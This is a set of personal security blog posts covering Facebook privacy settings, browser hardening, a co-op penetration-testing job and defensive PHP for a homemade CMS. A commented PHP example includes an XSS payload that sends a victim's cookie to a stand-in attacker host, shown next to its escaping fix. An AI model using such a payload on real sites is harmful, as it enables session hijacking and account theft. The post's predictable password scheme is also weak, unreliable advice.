Fix Your Facebook Privacy Settings

Earlier this week, Facebook rolled out a new privacy policy that allows outside applications to view information stored about you, including your likes, connections, education, current city, and more. Needless to say, there’s a big privacy issue here. While you want your friends to be able to see this information, you want to avoid handing it to third parties as much as possible. Here are some key tips for locking down your profile from those automated prying eyes.

1. Remove Instant Personalization [link]

Instant Personalization gives your information to third-party websites such as Docs.com, Pandora, and Yelp. Uncheck this box to prevent these sites from accessing your information.

2. Remove Unused (and sketchy) Applications [link]

Chances are you’ve added an application at some point, and even though you removed it from your profile, it probably still has access to your information. Remove any unwanted applications by going to the link above and deleting the apps that shouldn’t be there. You might be surprised how many can still see your information!

3. Remove Your Public Profile [link]

Data miners largely rely on your public profile as a starting point for gathering your information. Remove that ability by going to the link above: change your Facebook Search Results to Friends and Networks, and then uncheck the option to have a public profile.

4. Lock Down Your Contact Information [link]

On this page, you can find all of the ways people can contact you. Unless you really want anyone at all to be able to reach you, it is best to set almost all of these to “Friends” and nothing else. The only exceptions are the options to add you as a friend and to send you messages; both are worth leaving open to everybody unless they start attracting spam.

5. Lock Down Your Profile Information [link]

Finally, there’s your actual profile information, which should be locked down as well. Setting all of these to “Only Friends” is the best course of action.

If you haven’t done so already, lock down your information soon. I can guarantee that automated data-mining services are working full-tilt right now, in case Facebook reverts its privacy settings. It’s time to take control of your profile.

Five Steps To Protect Against Browser Attacks

Some days, it pains me to see how woefully insecure some web browsers are. Every day, it seems, ten new browser-based exploits (or client-side attacks, as my presentation will tell you) are publicly released, and just because you’re on a site that you think is legitimate doesn’t mean that somebody hasn’t compromised it.

For those of you using Internet Explorer (IE), I pity you. IE, still the most commonly used browser in the world, is by far the biggest target of all the major browsers. If you’re smart enough to use another, better browser, then you’re already one step towards protecting yourself. I’m going to assume, though, that you’re using Firefox or one of its derivatives such as Flock, since the plug-in libraries are huge.

1. Use the Web of Trust

https://addons.mozilla.org/en-US/firefox/addon/3456
My Web of Trust (MyWOT) is a Firefox plugin that warns you about potentially risky sites. It can alert you to known scam sites, spam sites, and pages known for hosting malware. It gives you a quick idea of how trustworthy the site you are visiting is, and adds a nice extra layer of protection against attacks on your computer.

2. Block JavaScript and Popups

AdBlock Plus: https://addons.mozilla.org/en-US/firefox/addon/1865
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722
The most common form of browser-based attack is cross-site scripting, or XSS. XSS abuses JavaScript (a scripting language that websites use) to force your browser to do something. Most JavaScript usage is legitimate: when you post something on somebody’s wall on Facebook, JavaScript pushes the new message onto the wall without refreshing the page, and creates that cool sliding effect as the old posts move down. It can be put to malicious use, though. Stealing login credentials is a common one, but I’ve seen JavaScript sophisticated enough to hijack your browser, forcing it to visit sites without any input from you, or even to download and run malware against your will. NoScript blocks all JavaScript by default and lets you enable only what you trust. It takes a while to configure properly, but after a week or so of setting it up, you’ll be a lot more secure. XSS sometimes propagates through ads, so AdBlock Plus is nice to have as well.
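
To make the attack concrete, here’s a minimal PHP sketch (the page and field names are made up for illustration) of the classic mistake that makes XSS possible, and the output escaping that prevents it:

```php
<?php
// Hypothetical comment page -- the field name is made up for illustration.
$comment = isset($_GET['comment']) ? $_GET['comment'] : '';
// An attacker might supply something like:
// <script>document.location='http://evil.example/?c='+document.cookie</script>

// VULNERABLE: echoing raw input lets the injected script run in the
// victim's browser (and walk off with their session cookie).
// echo '<p>' . $comment . '</p>';

// SAFER: encode HTML metacharacters so the payload renders as plain text.
echo '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';
```

NoScript protects you from the client side of exactly this kind of mistake; the server-side fix is the developer’s job.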

3. Use Different Passwords

This always seemed like a no-brainer to me, but I know many people who won’t do it. Using the same password for multiple sites is just stupid: if somebody manages to steal your password from one site, what’s stopping them from logging into another? (And no, having a different user name isn’t going to prevent anything.) Instead, use a different password for each site, at least eight characters long, with random characters. If you can’t remember all of those, take two 4-character random strings and put one on either side of the site’s domain name; there’s your password. For example: “4n$sFACEBOOKn4%l”. Swap “e” for “3”, “s” for “$”, or “l” for “1” – think L33T!
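
Here’s a minimal sketch of that scheme in PHP (the two random strings are just the ones from the example above, with the L33T swaps applied to the domain; pick and memorize your own):

```php
<?php
// A minimal sketch of the scheme above -- two fixed random 4-character
// strings wrapped around the site's domain name, with some L33T swaps.
function site_password($domain) {
    $prefix = '4n$s';   // pick your own random strings and memorize them
    $suffix = 'n4%l';
    // Leet-style substitutions on the domain: e -> 3, s -> $, l -> 1
    $leet = strtr(strtoupper($domain), array('E' => '3', 'S' => '$', 'L' => '1'));
    return $prefix . $leet . $suffix;
}

echo site_password('facebook');  // prints: 4n$sFAC3BOOKn4%l
```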

4. Clear Those Tracking Cookies

https://addons.mozilla.org/en-US/firefox/addon/6623
Although you may not realize it, tracking cookies follow your movement around the internet. You may visit very different web pages, but the company that displays ads on those sites is often the same, so it can build a profile of where you go. Beat these cookies with BetterPrivacy, which removes tracking cookies and LSOs (Flash “super cookies”) from your browser.

5. If You Didn’t Expect To Get It, Don’t Click It

I hate to have to reiterate common sense, but sometimes it escapes us. If you didn’t expect to get a link from somebody, or they sent you a file that you weren’t planning on getting, don’t open it. I don’t care if it came from their MSN account; if they didn’t follow rule #3, there’s no reason their account couldn’t have been hacked. If someone sends you a link, do yourself a favour and just ASK the person what it is before you click it; if the reply sounds like something your friend would actually say, then you’re probably okay.


Well, that took longer than expected. Hopefully it’s of some use to people. As always, I appreciate your comments and feedback. If you like what you read, help me out by posting the article on Reddit, Facebook, or Digg (or sending the link to a friend). See you next Monday!

IPAM Presentation: November 2009

Last Wednesday, the other co-op student and I gave a presentation to the Information Protection Association of Manitoba (IPAM) about attacks on web-based applications. It was certainly an interesting experience. Although it wasn’t a stellar performance, I think we did okay considering our presentation skills. Unfortunately, we were expecting a more technical-minded audience than the business-minded one we got, and I got the impression that some of the talk went a little over the heads of a few of those in attendance. Regardless, it was a learning experience, and I took a lot away from it.

I was approached twice after our presentation was over. The first gentleman suggested, to paraphrase, that the presentation would be more useful if it included a mitigation strategy to prevent and (hopefully) eliminate the possibility of attack. I thought he might be on to something. After all, wouldn’t it be great to have a checklist to go through, where checking off every item would result in a secure application? For the rest of the day, I went back and forth on the idea. On one hand, such a checklist would be nice; on the other, I firmly believe that much of the prevention relies on the skill of the programmer, debugger, and penetration tester, and a checklist alone simply wouldn’t be sufficient to protect you from attacks. Still, it would be a good start: an “if you’ve done these things, you’ve covered the basics” list. It would be a good reminder sheet for professional programmers and a good stepping stone for those just starting out. To that gentleman: your suggestion has been heard, and the checklist has been added to my to-do list. I hope to have a first draft out within a month or so, so stay tuned.

The second gentleman asked if the slides would be online for later viewing. Even though the presentation took almost an hour, I was well aware that we were rushing; we probably had more content than we had time to cover. Before the presentation, I had already planned to put the slides online as a reference; it’s nice to see the slides during the talk, but it’s also nice to be able to go back to them at a later date. Thus, my slides will be online here for anybody to take a look at. I will also be posting my source code, but that will be a bit later (i.e., probably next week), since a few sections are a little finicky right now.

The First Week

Looking forward to going to work is a feeling that I had never felt before this week. It’s an odd feeling, and one I don’t know if I will ever completely get used to. Of course, I’m sure it will wear off after a while.

In the past week, I have had a number of experiences that I would not have gotten any other place. My first two days were spent trying to break into a web application on a VM. Although I managed to get access to a few things, I never really got that far.

Today presented a similar scenario. In a virtual network, there were a number of computers: some desktops and some servers. I had to gain access to some “financial information” hidden on a server, using exploits in the other machines to work my way in. Although I needed a few hints here and there, I managed to get the sensitive information using a variety of tools, including two kernel exploits, sqlmap, Nmap, Metasploit, and RainbowCrack. It was a really fun experience, and I’m glad I got to take it for a test drive.

The icing on the cake for today, however, was using a decompiler to pull apart a fake program requiring activation and bypassing its registration. From the information gathered, we made a keygen using three different methods. Doing so requires a bit of smarts and a lot of assembly knowledge, which is something I don’t have much of. With some help, though, I managed to crack the registration, which was an exhilarating experience.

These experiences are pretty much all thanks to Ron Bowes, one of the guys I’m working with. I’d call him an IT professional (he’s certainly skilled enough), but he might laugh at me for such a remark. The virtual network was all designed by him, and he walked me through the application hacking, showing me every step and how it was done. I certainly have no intention of using any of that knowledge to break the registration of any program for any reason other than my own personal development, but it was still a really amazing experience. He keeps a blog on his homepage (I’m mentioned in a recent post), and it’s certainly an interesting read.

A final thing I’m working on at work is a suitable replacement for Burp Suite, an application for attacking web applications. It’s a really powerful program, but there are three main problems with it: it’s closed source, you have to pay for it, and the Swing interface is god-awful ugly. Other free utilities lack in power, user interface, or both. So, pending approval from a supervisor, I might be helping to develop a free, open-source alternative that would be released into the public domain. We’ve decided to program the backend in Ruby, and so far it’s going really smoothly. In just one day, I almost have the proxy designed, and I’m looking forward to getting the backend completed.

All in all, work is great so far. Getting paid to do something you love is amazing.

Going Open Source

The first time I wrote a full website, I made a lot of mistakes. A LOT.

Although it’s not completely obvious from the outside, H2H Security Group is built on a pretty shoddy content management system (CMS). There are bugs, there are incomplete sections of the site, and there is little administration that doesn’t require direct database access. I’ve stopped development on the current CMS and decided to go for a complete overhaul. That’s right: I’m completely re-building the system, H2H CMS, from the ground up.

Normally, this would be a preposterous idea, and perhaps it’s not the most efficient route to take, but I won’t be walking away from the old CMS empty-handed. Working on it was an amazing experience. The system was terribly designed, but I’ve grown a lot as a programmer since I first started it. I’ve learned about things like classes, hierarchies, debugging tools, exceptions, mysqli, more advanced MySQL statements, and caching. I’ve learned about the differences between versions of software such as PHP, which saw monumental changes from PHP4 to PHP5. Most importantly, I learned proper software development in a university course. Looking back, I have learned from every mistake I made during the design of the old CMS, and I’m willing to make a mistake if it means I learn from it.

Another big change I’m making is that I am going open source: letting anyone take a look at the source code. I’m sticking with a Creative Commons license, which allows anyone to take the code, modify it, and redistribute it for free, provided they give me credit for the original work. I think it’s the right choice, in keeping with the hacker mentality and whatnot. With a goal of distributing knowledge and information to the masses, going open source is a logical step toward achieving that.

I started development of the new CMS quite differently than before; rather than jumping straight into the coding, I started off old-school, with a pen and paper. Designing before developing helped ensure everything stayed organized this time, and developing class by class, piece by piece, gave me logical places to start and stop work.

The part of this CMS that I am most proud of, however, is that security is built in as standard, not bolted on as an afterthought. To someone interested in security this seems like a no-brainer, but in other available systems it seemed to be either non-existent, poorly implemented, or achieved at the expense of efficiency. By considering security and efficiency at the same time, I hope to build a system that maintains both equally.
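
As one small example of what “security as standard” means in practice, here’s a minimal sketch of the kind of data access the new CMS is built around (the table and column names are made up for illustration):

```php
<?php
// A minimal sketch of security-by-default data access -- the table and
// column names here are made up for illustration.
$db = new mysqli('localhost', 'cms_user', 'secret', 'h2h_cms');

$slug = isset($_GET['slug']) ? $_GET['slug'] : '';

// A prepared statement keeps user input out of the SQL string entirely,
// eliminating SQL injection by design rather than by patching.
$stmt = $db->prepare('SELECT title, body FROM articles WHERE slug = ?');
$stmt->bind_param('s', $slug);
$stmt->execute();
$stmt->bind_result($title, $body);

while ($stmt->fetch()) {
    // Escape on output too, so stored content can't inject markup.
    echo '<h2>' . htmlspecialchars($title, ENT_QUOTES, 'UTF-8') . '</h2>';
}
$stmt->close();
```

Prepared statements and output escaping cost almost nothing at runtime, which is exactly the kind of security-without-sacrificing-efficiency trade-off I’m aiming for.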

I always like to see people become involved in my projects. If someone is interested in helping with the development, let me know, and maybe something can be arranged.

Ohloh Page: http://ohloh.net/p/h2h-cms/

Project Trac Page: http://dj-bri-t.servehttp.com/projects/cms/

Meat In A Tin

Over the past week or so, I’ve found that one of my other websites, H2H Security Group, has been getting a lot of spam. Unfortunately, it’s not just random ads from bots. Bots I can deal with, and it’s unlikely they’ll ever get past registration because there’s a reCAPTCHA on the sign-up form. No, I have to deal with credit card spam.

Most people I know get spam in their email; it happens to almost all of us who have a presence on the web with an email address. If you’ve ever read the spam, it’s usually just a random string of words with a few links in it. Heck, some of it is downright amusing. But credit card spam is more of a problem: not only is it a nuisance, it’s highly illegal. Not something you want on a legitimate website.

The first problem was determining whether the spam was automated (i.e., from a bot) or posted by a person. The easiest way to do this was to install the reCAPTCHA system I mentioned above. If you’ve signed up for any major service recently, chances are you’ve encountered a CAPTCHA of some sort: the images with random numbers and letters that are supposed to be hard for an automated system to read, but fairly easy for a human. They are specifically designed to keep bots out. Although the reCAPTCHA system I installed stopped some of the spam, it didn’t stop all of it.
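
For the curious, server-side verification with the reCAPTCHA PHP library looks roughly like this (a sketch, assuming the standard recaptchalib.php helpers; the key and the registration handler are placeholders):

```php
<?php
// A rough sketch of server-side reCAPTCHA verification using the classic
// recaptchalib.php helper library. The private key here is a placeholder.
require_once('recaptchalib.php');

$privatekey = 'your-private-key';
$resp = recaptcha_check_answer($privatekey,
                               $_SERVER['REMOTE_ADDR'],
                               $_POST['recaptcha_challenge_field'],
                               $_POST['recaptcha_response_field']);

if (!$resp->is_valid) {
    // Probably a bot (or a human who can't read squiggly letters) -- reject.
    die('CAPTCHA failed: ' . $resp->error);
} else {
    // Looks human; carry on with registration.
    create_account($_POST); // hypothetical registration handler
}
```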

Stopping spam requires ruling your web site with an iron fist. Automated scripts will help minimize it, but on a long enough timeline, spam will get through; it’s bound to happen. Currently, the only reliable way I’ve found to stop it is to start blocking IP addresses. In this incident, I was forced to block an entire subnet: I found that an ISP in Vietnam was producing a lot of the spam I received, and after numerous emails to their abuse department turned out to be deleted without being read, I made the decision to block the entire ISP from my web site.
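
For reference, here’s a minimal sketch of how that kind of subnet block can be done at the application level (the CIDR range below is a documentation placeholder, not the real netblock; a firewall or .htaccess rule is faster in practice):

```php
<?php
// A minimal sketch of subnet blocking at the application level -- the
// CIDR range below is a placeholder; substitute the offending netblock.
function ip_in_subnet($ip, $cidr) {
    list($subnet, $bits) = explode('/', $cidr);
    $mask = -1 << (32 - (int)$bits);   // e.g. /24 keeps the top 24 bits
    return (ip2long($ip) & $mask) === (ip2long($subnet) & $mask);
}

if (ip_in_subnet($_SERVER['REMOTE_ADDR'], '203.0.113.0/24')) {
    header('HTTP/1.1 403 Forbidden');
    die('Access denied.');
}
```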

Doing so is a bit of a double-edged sword. On one hand, the spam has stopped since I did it (although that was only two days ago; let’s see what happens!). On the other hand, I have pretty much cut off an entire country from visiting my site. Granted, speakers of the primary language there are not my site’s target audience, but it still has the problem of cutting off legitimate users.

Of course, this is not a foolproof solution. There’s no reason a person on that ISP couldn’t use a proxy to access my site and post more spam, but I’m taking a proactive approach to preventing this spam, and that’s about all one can do. Perhaps an interesting project would be a central repository of known spamming IP addresses, so those IPs could be blocked by many websites around the world rather than by a single server. Servers that regularly pick up spam could add IPs to the list for a number of days, and other servers could download the list and block accordingly. It’s something to consider to stop the spread of spam across the world.
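
On the consuming side, that idea might look something like this (a hedged sketch; the repository URL is hypothetical, since no such central list exists yet):

```php
<?php
// A hedged sketch of the shared-blocklist idea above. The URL is
// hypothetical -- no such central repository exists (yet).
$list = @file_get_contents('http://blocklist.example.org/spammers.txt');
$blocked = ($list !== false)
    ? array_filter(array_map('trim', explode("\n", $list)))
    : array();

// In a real deployment, cache the list locally and refresh it daily
// rather than fetching it on every request.
if (in_array($_SERVER['REMOTE_ADDR'], $blocked, true)) {
    header('HTTP/1.1 403 Forbidden');
    die('Your IP address has been reported for spamming.');
}
```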